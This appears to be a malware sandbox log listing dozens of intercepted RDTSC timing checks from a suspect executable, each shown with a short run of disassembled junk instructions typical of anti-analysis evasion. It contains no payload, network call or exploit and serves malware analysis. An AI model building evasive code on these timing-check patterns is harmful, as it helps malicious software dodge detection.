                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 774ACA second address: 774AD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 774AD3 second address: 774AD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 774AD7 second address: 774AE7 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7290766B26h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7754A4 second address: 7754A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7754A8 second address: 7754B5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7290766B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7754B5 second address: 7754BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7754BF second address: 7754C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7754C9 second address: 7754CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7754CF second address: 7754DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007F7290766B26h 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 777F60 second address: 777F78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290C62CAFh 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 777F78 second address: 777F92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F7290766B31h 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 778384 second address: 778388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 778388 second address: 77839A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7290766B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007F7290766B26h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7802FF second address: 78033E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F7290C62CB2h 0x0000000d push esi 0x0000000e jne 00007F7290C62CA6h 0x00000014 jmp 00007F7290C62CAAh 0x00000019 pop esi 0x0000001a popad 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F7290C62CAFh 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 78033E second address: 780353 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F7290766B2Ah 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 780353 second address: 78035B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6DE0AE second address: 6DE0BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290766B2Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6DE0BF second address: 6DE0D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7290C62CADh 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 77E581 second address: 77E585 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6CECE8 second address: 6CECEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 783E9A second address: 783EAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290766B2Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 783EAB second address: 783EB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 783EB1 second address: 783EBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F7290766B26h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 784184 second address: 784194 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7290C62CB2h 0x00000008 js 00007F7290C62CA6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 784194 second address: 7841B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jo 00007F7290766B26h 0x00000017 push edx 0x00000018 pop edx 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7841B0 second address: 7841E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F7290C62CA6h 0x00000009 jmp 00007F7290C62CB2h 0x0000000e jmp 00007F7290C62CB8h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7848E9 second address: 7848FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jno 00007F7290766B26h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7848FB second address: 7848FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 78934A second address: 789350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 789350 second address: 789354 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 789354 second address: 78937B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F7290766B26h 0x00000008 jmp 00007F7290766B2Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F7290766B31h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 78937B second address: 7893CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F7290C62CA6h 0x00000009 jmp 00007F7290C62CB3h 0x0000000e jmp 00007F7290C62CB1h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push esi 0x00000019 jmp 00007F7290C62CACh 0x0000001e pop esi 0x0000001f pushad 0x00000020 jnc 00007F7290C62CA6h 0x00000026 pushad 0x00000027 popad 0x00000028 jc 00007F7290C62CA6h 0x0000002e popad 0x0000002f rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 78AA66 second address: 78AA6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 78AA6C second address: 78AA70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 78AA70 second address: 78AA74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 794282 second address: 79428C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F7290C62CA6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 79428C second address: 794290 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 794290 second address: 794296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 794296 second address: 79429E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 79251C second address: 792522 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 792522 second address: 792526 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 792526 second address: 792530 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 792530 second address: 792536 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7927EE second address: 7927F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7927F2 second address: 7927F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7927F6 second address: 792814 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7290C62CABh 0x0000000b jo 00007F7290C62CAAh 0x00000011 push edx 0x00000012 pop edx 0x00000013 pushad 0x00000014 popad 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 792A99 second address: 792AA1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 792AA1 second address: 792AA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 792C37 second address: 792C3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 792DE5 second address: 792DF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F7290C62CA6h 0x0000000a pop esi 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 792DF0 second address: 792E0E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 ja 00007F7290766B26h 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 jo 00007F7290766B26h 0x0000001b pushad 0x0000001c popad 0x0000001d pop ecx 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 792FC3 second address: 792FCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F7290C62CA6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 79328E second address: 793297 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 793297 second address: 79329D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 79329D second address: 7932A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 791FE2 second address: 791FEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F7290C62CA6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 791FEE second address: 791FF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7982B7 second address: 7982BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 79BC3A second address: 79BC42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 79BC42 second address: 79BC47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 79BC47 second address: 79BC62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7290766B2Ch 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c ja 00007F7290766B26h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7A7117 second address: 7A7126 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007F7290C62CA6h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7AA847 second address: 7AA850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7B1843 second address: 7B1847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7B1847 second address: 7B1872 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F7290766B39h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c jo 00007F7290766B40h 0x00000012 push ebx 0x00000013 push edi 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7B1872 second address: 7B1882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jl 00007F7290C62CA6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7B0312 second address: 7B032A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290766B34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7B032A second address: 7B0362 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290C62CABh 0x00000007 pushad 0x00000008 jmp 00007F7290C62CB9h 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 push edx 0x00000018 pop edx 0x00000019 pop ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7B0362 second address: 7B0368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7B0368 second address: 7B036C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7B036C second address: 7B0376 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7290766B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7B0376 second address: 7B037C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7B037C second address: 7B0386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F7290766B26h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7B0386 second address: 7B038A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7B038A second address: 7B039A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007F7290766B26h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7B04F6 second address: 7B052D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F7290C62CA6h 0x0000000a pop esi 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F7290C62CB0h 0x00000018 jmp 00007F7290C62CB4h 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7B052D second address: 7B0531 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7BDAF5 second address: 7BDAFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7BD989 second address: 7BD98E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7C4B68 second address: 7C4B6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7C4B6D second address: 7C4B75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7C4B75 second address: 7C4B8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F7290C62CA6h 0x0000000a popad 0x0000000b jc 00007F7290C62CAEh 0x00000011 push esi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7C4CCD second address: 7C4CD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7C4CD5 second address: 7C4CDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7C4CDE second address: 7C4CE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7C4F63 second address: 7C4F69 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7C5263 second address: 7C5269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7C9D06 second address: 7C9D12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7C9D12 second address: 7C9D1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F7290766B26h 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7C9A20 second address: 7C9A2A instructions: 0x00000000 rdtsc 0x00000002 js 00007F7290C62CA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7D4D00 second address: 7D4D28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F7290766B2Bh 0x0000000c jmp 00007F7290766B36h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7D4D28 second address: 7D4D3D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 jmp 00007F7290C62CABh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7D4D3D second address: 7D4D57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F7290766B26h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F7290766B2Bh 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7D4D57 second address: 7D4D69 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7290C62CA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007F7290C62CAEh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7D4BA5 second address: 7D4BAA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
